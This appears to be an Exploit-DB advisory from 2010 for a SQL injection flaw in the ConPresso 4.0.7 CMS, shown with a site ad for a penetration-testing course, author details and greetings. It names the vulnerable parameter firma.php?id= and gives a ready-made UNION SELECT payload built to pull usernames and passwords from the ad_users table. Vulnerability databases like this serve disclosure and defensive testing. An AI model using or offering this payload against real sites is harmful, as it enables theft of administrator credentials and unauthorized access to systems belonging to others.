ConPresso 4.0.7 - SQL Injection

EDB-ID:

12684


Author:

Gamoscu

Type:

webapps


Platform:

PHP

Date:

2010-05-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

ConPresso 4.0.7 SQL Injection  Vulnerability  
    
########################### 
    
Author    : Gamoscu  
Homepage  : http://www.1923turk.com  
Blog      : http://gamoscu.wordpress.com/  
Script    : ConPresso 4.0.7 
Download  : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
    
###########################   
      
[ Vulnerable File ] 
  
firma.php?id= [ SQL ] 
       
  
[ XpL ] 
    
-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users 
  
  
    

iyi ki dogdun DELiBEY

     
##############################################################   
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO   
##############################################################